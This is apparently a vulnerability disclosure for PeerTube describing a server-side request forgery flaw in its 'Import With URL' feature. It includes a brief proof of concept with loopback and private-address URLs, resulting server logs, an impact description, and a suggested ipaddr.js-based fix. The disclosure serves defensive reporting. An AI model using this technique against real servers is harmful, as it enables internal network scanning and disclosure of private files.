Description

There is an SSRF vulnerability in PeerTube, registered users outside of the external network can issue GET requests into the internal network via the Import With URL option.

Proof of Concept

Setting a Python3 server on 8080

python3 -m http.server 8080

And importing this URL

http://127.0.0.1:8080

Will cause a request to be issued to localhost

gitpod /workspace/PeerTube $ python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
127.0.0.1 - - [30/Dec/2021 10:03:31] "HEAD / HTTP/1.1" 200 -
127.0.0.1 - - [30/Dec/2021 10:03:31] "GET / HTTP/1.1" 200 -

Impact

External attackers can port scan and map the internal network. They can also escalate the impact of SSRF to disclose videos stored on webservers on the internal network. For example, if a sensitive file is stored in another server http://192.168.0.1/video.mp4, they can input that URL to reveal the video present.

Recommended Fix

The https://www.npmjs.com/package/ipaddr.js/v/1.1.0 package can be used to determine if an IP address is public or private instead of trying to catch all possible private IP addresses.

var ipAddr = require('ipaddr.js')

// BAD
console.log(ipAddr.parse("127.0.0.1").range())
console.log(ipAddr.parse("192.168.0.1").range())
console.log(ipAddr.parse("::ffff:7f00:2").range())
console.log(ipAddr.parse("fd12:3456:789a:1::1").range())

// GOOD
console.log(ipAddr.parse("142.251.12.138").range())

unicast = good.

loopback
private
ipv4Mapped
uniqueLocal
unicast